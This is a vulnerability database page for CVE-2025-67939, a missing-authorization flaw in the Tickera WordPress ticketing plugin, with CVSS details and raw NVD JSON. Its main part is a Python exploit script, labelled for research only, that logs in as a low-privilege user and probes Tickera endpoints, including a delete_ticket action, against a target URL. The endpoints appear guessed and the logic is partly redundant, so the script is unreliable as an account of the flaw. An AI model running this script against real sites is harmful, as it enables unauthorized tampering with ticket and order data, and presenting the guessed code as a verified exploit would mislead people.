Security Vulnerability Report
中文
CVE-2025-67939 CVSS 6.5 MEDIUM

CVE-2025-67939

Published: 2026-01-22 17:16:03
Last Modified: 2026-04-27 18:16:51

Description

Missing Authorization vulnerability in Tickera Tickera tickera-event-ticketing-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tickera: from n/a through <= 3.5.6.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Tickera Event Ticketing System <= 3.5.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import urljoin # CVE-2025-67939 PoC - Missing Authorization in Tickera Plugin # Target: WordPress site with vulnerable Tickera plugin <= 3.5.6.2 def exploit_tickera_auth_bypass(target_url, username, password): """ Exploit missing authorization vulnerability in Tickera plugin. This PoC demonstrates how a low-privilege user can access unauthorized resources. """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print('[-] Authentication failed') return False print('[+] Successfully authenticated as low-privilege user') # Step 2: Exploit missing authorization - access admin functions # Target vulnerable Tickera API endpoints vulnerable_endpoints = [ '/wp-json/tickera/v1/tickets', '/wp-json/tickera/v1/orders', '/wp-admin/admin-ajax.php?action=ticket_details', '/wp-admin/admin-ajax.php?action=delete_ticket' ] for endpoint in vulnerable_endpoints: full_url = urljoin(target_url, endpoint) # Low-privilege user attempting to access privileged operations if 'admin-ajax.php' in endpoint: resp = session.get(full_url) else: resp = session.get(full_url) if resp.status_code == 200: print(f'[+] Accessed protected endpoint: {endpoint}') print(f' Response preview: {resp.text[:200]}...') elif resp.status_code == 403: print(f'[-] Endpoint blocked: {endpoint}') else: print(f'[*] Endpoint returned status {resp.status_code}: {endpoint}') return True if __name__ == '__main__': if len(sys.argv) < 4: print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>') print('Example: python cve-2025-67939.py http://example.com subscriber password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_tickera_auth_bypass(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67939", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:02.707", "lastModified": "2026-04-27T18:16:50.730", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Tickera Tickera tickera-event-ticketing-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tickera: from n/a through <= 3.5.6.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Tickera Tickera tickera-event-ticketing-system permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Tickera: desde n/a hasta &lt;= 3.5.6.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tickera-event-ticketing-system/vulnerability/wordpress-tickera-plugin-3-5-6-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}